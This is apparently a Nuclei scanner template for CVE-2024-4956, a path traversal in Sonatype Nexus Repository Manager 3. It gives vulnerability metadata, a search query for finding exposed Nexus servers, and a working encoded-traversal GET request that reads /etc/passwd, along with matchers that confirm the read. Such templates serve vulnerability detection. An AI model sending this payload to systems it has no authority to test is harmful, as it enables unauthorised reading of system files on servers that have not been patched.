id: CVE-2024-4956 info: name: Sonatype Nexus Repository Manager 3 - Local File Inclusion author: ritikchaddha severity: high description: | Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. reference: - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 - https://support.sonatype.com/hc/en-us/articles/29416509323923 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-4956 cwe-id: CWE-22 epss-score: 0.00044 epss-percentile: 0.10128 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sonatype product: nexus fofa-query: title="Nexus Repository Manager" tags: cve,cve2024,nexus,lfi http: - method: GET path: - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers: - type: dsl dsl: - regex('root:.*:0:0:', body) - contains(header, "application/octet-stream") - status_code == 200 condition: and # digest: 4a0a00473045022100f3fc0d77fbae2962a5f1baf5b9986fc4abe4ea968b3898fec35782a662cb3fbf022020a1ce16cea9d0dcfd42f0b7fe6550ada932bec3e3c8e4774c9254046ac4dfa1:922c64590222798bb761d5b6d8e72950